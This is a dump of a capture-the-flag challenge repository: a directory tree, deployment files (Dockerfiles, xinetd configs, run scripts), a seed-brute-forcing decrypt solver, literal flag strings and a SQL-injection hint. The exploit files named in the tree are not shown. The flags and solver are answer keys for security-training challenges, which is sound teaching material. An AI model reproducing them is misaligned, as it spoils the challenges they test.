├── .gitignore ├── README.md ├── ais3-eof ├── 2021-final │ ├── cat-slayer │ │ ├── README.md │ │ ├── assets │ │ │ ├── fake-func-name.png │ │ │ └── self-unpacking.png │ │ ├── challenge │ │ │ ├── cat_slayer.data.meow │ │ │ └── game.pyc │ │ └── src │ │ │ ├── decrypt.py │ │ │ ├── obfuscator.py │ │ │ └── source.py │ ├── cat-translator │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── docker-compose.yml │ │ ├── flag │ │ ├── share │ │ │ ├── main.py │ │ │ └── run.sh │ │ └── xinetd │ └── pikora │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── docker-compose.yml │ │ └── share │ │ ├── main.py │ │ └── run.sh ├── 2021-quals │ ├── Misc │ │ └── 3DUSH3LL │ │ │ ├── Dockerfile │ │ │ ├── README.md │ │ │ ├── docker-compose.yml │ │ │ ├── exploit │ │ │ └── solution.py │ │ │ ├── flag │ │ │ ├── share │ │ │ ├── main.py │ │ │ └── run.sh │ │ │ └── xinetd │ └── Web │ │ ├── CYBERPUNK1977 │ │ ├── README.md │ │ ├── app │ │ │ ├── hint.txt │ │ │ ├── main.py │ │ │ ├── sqlite.db │ │ │ ├── static │ │ │ │ ├── css │ │ │ │ │ └── bootstrap.min.css │ │ │ │ ├── fonts │ │ │ │ │ ├── Px437_IBM_EGA8.otf │ │ │ │ │ ├── arrow-down-black.svg │ │ │ │ │ ├── arrow-down-grayLight.svg │ │ │ │ │ ├── arrow-up-black.svg │ │ │ │ │ ├── arrow-up-grayLight.svg │ │ │ │ │ ├── checkbox-checked-black.svg │ │ │ │ │ ├── checkbox-checked-grayLight.svg │ │ │ │ │ ├── checkbox-unchecked-black.svg │ │ │ │ │ ├── checkbox-unchecked-grayLight.svg │ │ │ │ │ ├── grid-black.svg │ │ │ │ │ ├── grid-grayLight.svg │ │ │ │ │ ├── grid.svg │ │ │ │ │ ├── hyphen-black.svg │ │ │ │ │ ├── hyphen-grayLight.svg │ │ │ │ │ ├── left-brace-black.svg │ │ │ │ │ ├── left-brace-grayLight.svg │ │ │ │ │ ├── radio-checked-black.svg │ │ │ │ │ ├── radio-checked-grayLight.svg │ │ │ │ │ ├── radio-unchecked-black.svg │ │ │ │ │ ├── radio-unchecked-grayLight.svg │ │ │ │ │ ├── right-brace-black.svg │ │ │ │ │ ├── right-brace-grayLight.svg │ │ │ │ │ ├── shade-100-black.svg │ │ │ │ │ ├── shade-100-grayLight.svg │ │ │ │ │ ├── shade-25-black.svg │ │ │ │ │ ├── shade-25-grayLight.svg │ │ │ │ │ ├── shade-50-black.svg │ │ │ │ │ ├── shade-50-grayLight.svg │ │ │ │ │ ├── shade-75-black.svg │ │ │ │ │ └── shade-75-grayLight.svg │ │ │ │ └── js │ │ │ │ │ └── bootstrap.min.js │ │ │ ├── templates │ │ │ │ └── index.html │ │ │ └── uwsgi.ini │ │ └── exploit │ │ │ └── solution.py │ │ ├── ctf-note │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── exploit │ │ │ └── solution.py │ │ ├── src │ │ │ ├── config.js │ │ │ ├── main.py │ │ │ ├── plugins │ │ │ │ ├── nyan.js │ │ │ │ └── xss.js │ │ │ ├── static │ │ │ │ ├── app.js │ │ │ │ ├── bulma.min.css │ │ │ │ ├── markdown.min.js │ │ │ │ ├── nyancat.gif │ │ │ │ └── style.css │ │ │ ├── templates │ │ │ │ ├── index.html │ │ │ │ └── login.html │ │ │ └── uwsgi.ini │ │ └── xssbot │ │ │ ├── Dockerfile │ │ │ ├── run.sh │ │ │ └── xssbot.py │ │ ├── docker-compose.yml │ │ └── what-the-file │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── exploit │ │ ├── base64-solution.sh │ │ └── iconv-solution.sh │ │ ├── flag │ │ └── src │ │ ├── bootstrap.min.css │ │ ├── img │ │ ├── click.gif │ │ ├── counter2.gif │ │ ├── divider.gif │ │ ├── flames.gif │ │ ├── hot.gif │ │ ├── ie_logo.gif │ │ ├── microfab.gif │ │ ├── noframes.gif │ │ ├── notepad.gif │ │ ├── ns_logo.gif │ │ ├── rainbow.gif │ │ └── stars.gif │ │ └── index.php ├── 2022-final │ └── web-npy-viewer │ │ ├── Dockerfile │ │ ├── app │ │ ├── app.js │ │ ├── package.json │ │ └── yarn.lock │ │ └── flag ├── 2022-quals │ ├── Misc │ │ ├── babyheap │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── exploit │ │ │ │ └── exp.txt │ │ │ ├── flag │ │ │ │ ├── flag │ │ │ │ └── readflag.c │ │ │ ├── share │ │ │ │ ├── main.xonsh │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ └── leetcall │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── gen_probs.py │ │ │ ├── share │ │ │ ├── README.md │ │ │ ├── flag.txt │ │ │ ├── main.py │ │ │ ├── problems.sample.json │ │ │ ├── run.sh │ │ │ └── sandbox.tpl.py │ │ │ └── solution │ │ │ └── sol.py │ └── Web │ │ ├── babyphp │ │ ├── Dockerfile │ │ ├── docker-compose.yml │ │ ├── exploit │ │ │ └── exploit.php │ │ └── src │ │ │ ├── bootstrap.min.css │ │ │ ├── cooool.css │ │ │ ├── img │ │ │ ├── click.gif │ │ │ ├── counter2.gif │ │ │ ├── divider.gif │ │ │ ├── flames.gif │ │ │ ├── hot.gif │ │ │ ├── ie_logo.gif │ │ │ ├── microfab.gif │ │ │ ├── noframes.gif │ │ │ ├── notepad.gif │ │ │ ├── ns_logo.gif │ │ │ ├── rainbow.gif │ │ │ └── stars.gif │ │ │ ├── index.php │ │ │ ├── phpinfo.php │ │ │ ├── sandbox │ │ │ └── .gitkeep │ │ │ └── template.html │ │ ├── gistmd │ │ ├── app │ │ │ ├── Dockerfile │ │ │ ├── main.py │ │ │ ├── static │ │ │ │ ├── app.js │ │ │ │ └── style.css │ │ │ ├── templates │ │ │ │ ├── base.html │ │ │ │ ├── index.html │ │ │ │ ├── login.html │ │ │ │ ├── new.html │ │ │ │ └── note.html │ │ │ └── uwsgi.ini │ │ ├── bot │ │ │ ├── Dockerfile │ │ │ ├── run.sh │ │ │ └── xssbot.py │ │ ├── docker-compose.yml │ │ └── exploit │ │ │ ├── easy-unintended.txt │ │ │ └── intended.py │ │ ├── happy-metaverse-year │ │ ├── Dockerfile │ │ ├── app │ │ │ ├── app.js │ │ │ ├── flag.json │ │ │ ├── package-lock.json │ │ │ ├── package.json │ │ │ ├── public │ │ │ │ ├── link-start.mp4 │ │ │ │ ├── start.png │ │ │ │ ├── style.css │ │ │ │ ├── uso.jpeg │ │ │ │ ├── welcome.mp4 │ │ │ │ └── welcome.png │ │ │ └── views │ │ │ │ ├── failed.ejs │ │ │ │ ├── index.ejs │ │ │ │ └── welcome.ejs │ │ ├── docker-compose.yml │ │ └── exploit │ │ │ └── exploit.py │ │ ├── imgura-album │ │ ├── Dockerfile │ │ ├── docker-compose.yml │ │ ├── exploit │ │ │ └── exploit.php │ │ ├── flag │ │ │ ├── flag │ │ │ └── readflag.c │ │ └── src │ │ │ ├── composer.json │ │ │ ├── composer.lock │ │ │ ├── html │ │ │ ├── .htaccess │ │ │ ├── index.php │ │ │ └── uploads │ │ │ │ └── .htaccess │ │ │ ├── lib │ │ │ ├── class.album.php │ │ │ ├── class.user.php │ │ │ └── inc.common.php │ │ │ └── views │ │ │ ├── album.php │ │ │ ├── footer.php │ │ │ ├── header.php │ │ │ ├── home.php │ │ │ └── login.php │ │ ├── pm │ │ ├── Dockerfile │ │ ├── docker-compose.yml │ │ ├── entrypoint.sh │ │ ├── exploit │ │ │ └── solution.txt │ │ ├── flag │ │ │ ├── flag │ │ │ └── readflag.c │ │ ├── nginx-site.conf │ │ └── src │ │ │ ├── admin.php │ │ │ ├── hacked-by-inari-okami-team.html │ │ │ ├── index.php │ │ │ ├── phpinfo.php │ │ │ └── uploads │ │ │ └── webshell.php │ │ └── ssrf-or-not │ │ ├── Dockerfile │ │ ├── app │ │ ├── configs │ │ │ └── __init__.py │ │ ├── main_server.py │ │ └── views │ │ │ └── index.html │ │ ├── docker-compose.yml │ │ ├── exploit │ │ ├── easy-unintended.txt │ │ └── intended.py │ │ ├── flag │ │ ├── nginx.conf │ │ └── start.sh └── 2023-quals │ └── misc-rce │ ├── Dockerfile │ └── app │ ├── app.py │ ├── index.html │ └── uwsgi.ini ├── ais3-pre-exam ├── 2021 │ ├── Misc │ │ ├── README.md │ │ ├── cat-slayer-cloud │ │ │ ├── README.md │ │ │ ├── deploy │ │ │ │ ├── Dockerfile │ │ │ │ ├── docker-compose.yml │ │ │ │ ├── flag │ │ │ │ ├── share │ │ │ │ │ ├── game.py │ │ │ │ │ └── run.sh │ │ │ │ └── xinetd │ │ │ └── exploit.py │ │ ├── cat-slayer-fake │ │ │ ├── README.md │ │ │ ├── deploy │ │ │ │ ├── Dockerfile │ │ │ │ ├── docker-compose.yml │ │ │ │ ├── lock.py │ │ │ │ └── ssh │ │ │ │ │ ├── sshd │ │ │ │ │ └── sshd_config │ │ │ └── solve.py │ │ └── cat-slayer-online │ │ │ ├── README.md │ │ │ └── deploy │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── flag │ │ │ ├── share │ │ │ ├── game.py │ │ │ ├── player.db │ │ │ ├── run.sh │ │ │ └── sandbox.py │ │ │ └── xinetd │ ├── Reverse │ │ ├── Peekora │ │ │ ├── README.md │ │ │ ├── flag_checker.pkl │ │ │ └── solve.py │ │ └── README.md │ └── Web │ │ ├── 522-web-chals-monitor │ │ ├── README.md │ │ ├── deploy │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── flag │ │ │ └── src │ │ │ │ ├── challenges.db │ │ │ │ ├── config.php │ │ │ │ ├── index.php │ │ │ │ └── modules │ │ │ │ ├── api.php │ │ │ │ └── home.php │ │ └── poc.txt │ │ ├── README.md │ │ ├── cat-slayer-inverse │ │ ├── README.md │ │ ├── deploy │ │ │ ├── docker-compose.yml │ │ │ ├── flag │ │ │ ├── jstl-1.2.jar │ │ │ └── maou.war │ │ └── exploit │ │ │ ├── Exploit.java │ │ │ ├── com │ │ │ └── cat │ │ │ │ ├── Cat.java │ │ │ │ └── Maou.java │ │ │ └── run.sh │ │ ├── xss-me │ │ ├── README.md │ │ ├── deploy │ │ │ ├── app │ │ │ │ ├── Dockerfile │ │ │ │ ├── main.py │ │ │ │ ├── static │ │ │ │ │ ├── bulma.min.css │ │ │ │ │ ├── sweetalert2.min.css │ │ │ │ │ └── sweetalert2.min.js │ │ │ │ ├── templates │ │ │ │ │ └── index.html │ │ │ │ └── uwsgi.ini │ │ │ ├── bot │ │ │ │ ├── Dockerfile │ │ │ │ ├── run.sh │ │ │ │ └── xssbot.py │ │ │ └── docker-compose.yml │ │ └── poc.txt │ │ └── yet-another-login-page │ │ ├── README.md │ │ ├── deploy │ │ ├── app │ │ │ ├── main.py │ │ │ ├── templates │ │ │ │ ├── login.html │ │ │ │ └── welcome.html │ │ │ └── uwsgi.ini │ │ └── docker-compose.yml │ │ └── poc.txt └── 2022 │ ├── crypto │ └── double-aes │ │ ├── Dockerfile │ │ ├── chal.py │ │ └── docker-compose.yml │ ├── misc │ └── astjail │ │ ├── Dockerfile │ │ ├── flag │ │ ├── share │ │ ├── main.py │ │ └── run.sh │ │ └── xinetd │ └── web │ ├── best-login-ui │ ├── docker-compose.yml │ ├── mongo │ │ └── init.js │ └── src │ │ ├── app.js │ │ ├── index.html │ │ └── package.json │ ├── emoji-db │ ├── app │ │ ├── db.py │ │ ├── index.html │ │ ├── main.py │ │ ├── prestart.sh │ │ └── uwsgi.ini │ ├── docker-compose.yml │ └── sqlserver │ │ ├── Dockerfile │ │ ├── entrypoint.sh │ │ ├── init.sh │ │ └── init.sql │ ├── gallery │ ├── app │ │ ├── main.py │ │ ├── prestart.sh │ │ ├── static │ │ │ └── style.css │ │ ├── templates │ │ │ ├── base.html │ │ │ ├── index.html │ │ │ ├── login.html │ │ │ └── upload.html │ │ └── uwsgi.ini │ ├── bot │ │ ├── Dockerfile │ │ ├── run.sh │ │ └── xssbot.py │ ├── docker-compose.yml │ └── flag.png │ └── taritari │ ├── Dockerfile │ ├── docker-compose.yml │ ├── nginx.conf │ └── src │ ├── download.php │ └── index.php ├── balsn-ctf └── 2023 │ └── web-memes │ ├── Dockerfile │ ├── docker-compose.yml │ ├── exploit │ ├── exp.py │ └── inject.php │ ├── readflag.c │ └── webapp │ ├── .editorconfig │ ├── .env.example │ ├── .gitattributes │ ├── .gitignore │ ├── README.md │ ├── app │ ├── Console │ │ └── Kernel.php │ ├── Exceptions │ │ └── Handler.php │ ├── Http │ │ ├── Controllers │ │ │ ├── Controller.php │ │ │ └── ImageController.php │ │ ├── Kernel.php │ │ └── Middleware │ │ │ ├── Authenticate.php │ │ │ ├── EncryptCookies.php │ │ │ ├── PreventRequestsDuringMaintenance.php │ │ │ ├── RedirectIfAuthenticated.php │ │ │ ├── TrimStrings.php │ │ │ ├── TrustHosts.php │ │ │ ├── TrustProxies.php │ │ │ ├── ValidateSignature.php │ │ │ └── VerifyCsrfToken.php │ ├── Models │ │ └── User.php │ └── Providers │ │ ├── AppServiceProvider.php │ │ ├── AuthServiceProvider.php │ │ ├── BroadcastServiceProvider.php │ │ ├── EventServiceProvider.php │ │ └── RouteServiceProvider.php │ ├── artisan │ ├── bootstrap │ ├── app.php │ └── cache │ │ └── .gitignore │ ├── composer.json │ ├── config │ ├── app.php │ ├── auth.php │ ├── broadcasting.php │ ├── cache.php │ ├── cors.php │ ├── database.php │ ├── filesystems.php │ ├── hashing.php │ ├── logging.php │ ├── mail.php │ ├── queue.php │ ├── sanctum.php │ ├── services.php │ ├── session.php │ └── view.php │ ├── database │ ├── .gitignore │ ├── factories │ │ └── UserFactory.php │ ├── migrations │ │ ├── 2014_10_12_000000_create_users_table.php │ │ ├── 2014_10_12_100000_create_password_reset_tokens_table.php │ │ ├── 2019_08_19_000000_create_failed_jobs_table.php │ │ └── 2019_12_14_000001_create_personal_access_tokens_table.php │ └── seeders │ │ └── DatabaseSeeder.php │ ├── package.json │ ├── phpunit.xml │ ├── public │ ├── .htaccess │ ├── arial.ttf │ ├── favicon.ico │ ├── index.php │ ├── memes │ │ ├── genshin.jpg │ │ ├── genshin.png │ │ ├── is-this-bird.png │ │ └── is-this-butterfly.jpg │ └── robots.txt │ ├── resources │ ├── css │ │ └── app.css │ ├── js │ │ ├── app.js │ │ └── bootstrap.js │ └── views │ │ ├── image.blade.php │ │ └── make-meme.blade.php │ ├── routes │ ├── api.php │ ├── channels.php │ ├── console.php │ └── web.php │ ├── storage │ ├── app │ │ ├── .gitignore │ │ └── public │ │ │ └── .gitignore │ ├── framework │ │ ├── .gitignore │ │ ├── cache │ │ │ ├── .gitignore │ │ │ └── data │ │ │ │ └── .gitignore │ │ ├── sessions │ │ │ └── .gitignore │ │ ├── testing │ │ │ └── .gitignore │ │ └── views │ │ │ └── .gitignore │ └── logs │ │ └── .gitignore │ ├── tests │ ├── CreatesApplication.php │ ├── Feature │ │ └── ExampleTest.php │ ├── TestCase.php │ └── Unit │ │ └── ExampleTest.php │ └── vite.config.js ├── hitcon-quals ├── 2022 │ ├── misc │ │ ├── Picklection │ │ │ ├── exp │ │ │ │ ├── exp-3.8-1.py │ │ │ │ ├── exp-3.8-2.py │ │ │ │ ├── exp-3.9.py │ │ │ │ ├── exp-all.py │ │ │ │ └── exploit.py │ │ │ └── release │ │ │ │ ├── Dockerfile │ │ │ │ ├── docker-compose.yml │ │ │ │ ├── share │ │ │ │ ├── chal.py │ │ │ │ └── run.sh │ │ │ │ └── xinetd │ │ └── void │ │ │ ├── exp │ │ │ ├── exp.py │ │ │ ├── find.py │ │ │ └── oob_names.txt │ │ │ └── release │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ ├── chal.py │ │ │ └── run.sh │ │ │ └── xinetd │ └── web │ │ ├── S0undCl0ud │ │ ├── Dockerfile │ │ ├── docker-compose.yml │ │ ├── exp │ │ │ └── exp.py │ │ ├── instancer │ │ │ ├── app.js │ │ │ ├── docker-entrypoint.sh │ │ │ ├── hcaptcha.js │ │ │ ├── package-lock.json │ │ │ └── package.json │ │ └── service │ │ │ ├── Dockerfile │ │ │ └── app │ │ │ ├── app.py │ │ │ └── templates │ │ │ ├── index.html │ │ │ └── login.html │ │ ├── rce │ │ ├── Dockerfile │ │ ├── docker-compose.yml │ │ ├── exp.js │ │ ├── instancer │ │ │ ├── app.js │ │ │ ├── docker-entrypoint.sh │ │ │ ├── hcaptcha.js │ │ │ ├── package-lock.json │ │ │ └── package.json │ │ └── service │ │ │ ├── Dockerfile │ │ │ └── app │ │ │ ├── app.js │ │ │ ├── index.html │ │ │ ├── package-lock.json │ │ │ ├── package.json │ │ │ └── yarn.lock │ │ ├── sdm │ │ ├── app │ │ │ ├── Dockerfile │ │ │ └── app │ │ │ │ ├── app.js │ │ │ │ ├── hcaptcha.js │ │ │ │ ├── html │ │ │ │ ├── index.html │ │ │ │ ├── message.html │ │ │ │ └── report.html │ │ │ │ └── package.json │ │ ├── bot │ │ │ ├── Dockerfile │ │ │ ├── app.js │ │ │ ├── bot.js │ │ │ ├── package.json │ │ │ └── yarn.lock │ │ ├── docker-compose.yml │ │ └── exp │ │ │ └── index.html │ │ └── web2pdf │ │ ├── exp │ │ ├── generated-exp.html │ │ ├── genhtml.sh │ │ ├── parse.sh │ │ └── test.py.diff │ │ └── service │ │ ├── Dockerfile │ │ ├── docker-compose.yml │ │ └── src │ │ ├── hcaptcha.php │ │ └── index.php └── 2023 │ ├── misc-amf │ ├── Dockerfile │ ├── docker-compose.yml │ ├── exploit.py │ ├── instancer │ │ ├── app.js │ │ ├── docker-entrypoint.sh │ │ └── package.json │ └── service │ │ ├── Dockerfile │ │ └── server.py │ └── web-sharer │ ├── app │ ├── Dockerfile │ ├── app.js │ ├── package.json │ ├── static │ │ └── simple.css │ ├── uploads │ │ └── .gitkeep │ └── views │ │ ├── index.mustache │ │ ├── preview.mustache │ │ └── report.mustache │ ├── bot │ ├── Dockerfile │ └── index.js │ ├── certificates │ └── fullchain.pem │ ├── docker-compose.yml │ └── exploit.sh └── tsj-ctf ├── avatar ├── README.md ├── docker │ ├── Dockerfile │ ├── docker-compose.yml │ ├── files │ │ ├── init.sql │ │ ├── php.ini │ │ └── redis.conf │ ├── flag │ │ ├── flag │ │ └── readflag.c │ └── src │ │ ├── composer.json │ │ └── html │ │ ├── include.php │ │ ├── index.php │ │ ├── login.php │ │ ├── static │ │ ├── images │ │ │ └── default.jpeg │ │ └── style.css │ │ └── update.php ├── exploit │ ├── exploit.py │ ├── gadgets.php │ └── gen_serialized.php └── release.zip ├── genie ├── README.md ├── chall.tar.gz ├── deploy │ ├── Dockerfile │ ├── default.conf │ ├── docker-compose.yml │ ├── docker-entrypoint.sh │ ├── flag.txt │ ├── main.jl │ ├── server.js │ ├── service │ │ ├── Dockerfile │ │ ├── default.conf │ │ ├── docker-compose.yml │ │ ├── flag.txt │ │ ├── main.jl │ │ └── start.sh │ └── start.sh └── exploit │ ├── exploit.py │ └── gen_session.jl └── welcome-to-tsj-ctf ├── README.md ├── screenshot.png └── www.zip /.gitignore: -------------------------------------------------------------------------------- 1 | _draft/ 2 | .DS_Store 3 | -------------------------------------------------------------------------------- /ais3-eof/2021-final/cat-slayer/assets/fake-func-name.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-final/cat-slayer/assets/fake-func-name.png -------------------------------------------------------------------------------- /ais3-eof/2021-final/cat-slayer/assets/self-unpacking.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-final/cat-slayer/assets/self-unpacking.png -------------------------------------------------------------------------------- /ais3-eof/2021-final/cat-slayer/challenge/cat_slayer.data.meow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-final/cat-slayer/challenge/cat_slayer.data.meow -------------------------------------------------------------------------------- /ais3-eof/2021-final/cat-slayer/challenge/game.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-final/cat-slayer/challenge/game.pyc -------------------------------------------------------------------------------- /ais3-eof/2021-final/cat-slayer/src/decrypt.py: -------------------------------------------------------------------------------- 1 | import random 2 | import time 3 | import datetime 4 | import os 5 | 6 | if __name__ == '__main__': 7 | seed = int(os.stat('cat_slayer.data.meow').st_mtime) - 10 8 | enc_data = open("cat_slayer.data.meow", 'rb').read() 9 | while True: 10 | random.seed(seed) 11 | n = 8 12 | dec = '' 13 | for c in enc_data: 14 | key = random.randint(22, 222) + (n * 3 - 5) % 22 15 | dec += chr(c ^ key) 16 | n += 3 17 | if dec.startswith("___GAME_CAT"): 18 | print(seed) 19 | print(dec) 20 | break 21 | seed += 1 22 | 23 | -------------------------------------------------------------------------------- /ais3-eof/2021-final/cat-translator/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8.5 2 | 3 | RUN apt-get update 4 | RUN apt-get install xinetd -qy 5 | RUN useradd -m cat_translator 6 | COPY ./share /home/cat_translator 7 | COPY ./xinetd /etc/xinetd.d/cat_translator 8 | COPY ./flag /flag_aeab2c0bd54414b481a0b7683119ac8d 9 | RUN chown -R root:root /home/cat_translator 10 | RUN chmod -R 755 /home/cat_translator 11 | 12 | CMD ["/usr/sbin/xinetd","-dontfork"] 13 | -------------------------------------------------------------------------------- /ais3-eof/2021-final/cat-translator/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | cat-translator: 5 | build: ./ 6 | ports: 7 | - "2222:2222" 8 | expose: 9 | - "2222" 10 | -------------------------------------------------------------------------------- /ais3-eof/2021-final/cat-translator/flag: -------------------------------------------------------------------------------- 1 | AIS3{th1s_15_PEP-3131_meow!!!} -------------------------------------------------------------------------------- /ais3-eof/2021-final/cat-translator/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/cat_translator/main.py 5 | -------------------------------------------------------------------------------- /ais3-eof/2021-final/cat-translator/xinetd: -------------------------------------------------------------------------------- 1 | service cat_translator 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/cat_translator/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = cat_translator 10 | bind = 0.0.0.0 11 | port = 2222 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | flags = REUSE 16 | } 17 | -------------------------------------------------------------------------------- /ais3-eof/2021-final/pikora/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM docker:stable-dind 2 | 3 | RUN apk update 4 | RUN apk add libffi openssl 5 | RUN apk add --no-cache --virtual .build-deps python3-dev py-pip libffi-dev openssl-dev gcc libc-dev make 6 | 7 | RUN echo "**** install Python ****" && \ 8 | apk add --no-cache python3 && \ 9 | if [ ! -e /usr/bin/python ]; then ln -sf python3 /usr/bin/python ; fi && \ 10 | echo "**** install pip ****" && \ 11 | python3 -m ensurepip && \ 12 | rm -r /usr/lib/python*/ensurepip && \ 13 | pip3 install --no-cache --upgrade pip setuptools wheel && \ 14 | if [ ! -e /usr/bin/pip ]; then ln -s pip3 /usr/bin/pip ; fi 15 | 16 | 17 | RUN pip3 install epicbox 18 | RUN apk add --no-cache nmap-ncat 19 | 20 | WORKDIR /ctf 21 | 22 | ENTRYPOINT "/ctf/run.sh" 23 | -------------------------------------------------------------------------------- /ais3-eof/2021-final/pikora/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | pikora: 5 | privileged: true 6 | volumes: 7 | - ./share:/ctf 8 | build: ./ 9 | ports: 10 | - "48763:48763" 11 | expose: 12 | - "48763" 13 | -------------------------------------------------------------------------------- /ais3-eof/2021-final/pikora/share/run.sh: -------------------------------------------------------------------------------- 1 | #! /bin/sh 2 | rm /var/run/docker.pid 3 | dockerd & 4 | sleep 5s 5 | docker pull python:3.9-alpine 6 | ncat -vc 'timeout 500 python3 /ctf/main.py' -kl 0.0.0.0 48763 -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Misc/3DUSH3LL/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8.5 2 | 3 | RUN apt-get update 4 | RUN apt-get install xinetd -qy 5 | RUN useradd -m pyshell 6 | COPY ./share /home/pyshell 7 | COPY ./xinetd /etc/xinetd.d/pyshell 8 | COPY ./flag /flag_d053472057ab9e17d1a446ab9cd9ed1f 9 | RUN chown -R root:root /home/pyshell 10 | RUN chmod -R 755 /home/pyshell 11 | 12 | CMD ["/usr/sbin/xinetd","-dontfork"] 13 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Misc/3DUSH3LL/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | pyshell: 5 | build: ./ 6 | ports: 7 | - "5566:5566" 8 | expose: 9 | - "5566" 10 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Misc/3DUSH3LL/flag: -------------------------------------------------------------------------------- 1 | FLAG{there_is_no_misc_challenge_so_i_create_one_and_the_flag_is_ascii_only_finally} -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Misc/3DUSH3LL/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/pyshell/main.py 5 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Misc/3DUSH3LL/xinetd: -------------------------------------------------------------------------------- 1 | service pyshell 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/pyshell/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = pyshell 10 | bind = 0.0.0.0 11 | port = 5566 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | flags = REUSE 16 | } 17 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/hint.txt: -------------------------------------------------------------------------------- 1 | OLD_FL4G{qu1n3_sq1_1nj3ct10nnn.__init__} 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | ⬇ 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | - I use `tiangolo/uwsgi-nginx-flask` to build this cool stuff. (with default configuration) 48 | - [VISUAL BASIC 2077](https://drive.google.com/file/d/1AXEcUSwGlBON_1abv919AIw5CSX2I5VU/view) 49 | 50 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/sqlite.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/CYBERPUNK1977/app/sqlite.db -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/Px437_IBM_EGA8.otf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/Px437_IBM_EGA8.otf -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/arrow-down-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/arrow-down-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/arrow-up-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/arrow-up-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/checkbox-checked-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/checkbox-checked-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/checkbox-unchecked-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/checkbox-unchecked-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/grid-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/grid-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/grid.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/hyphen-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- 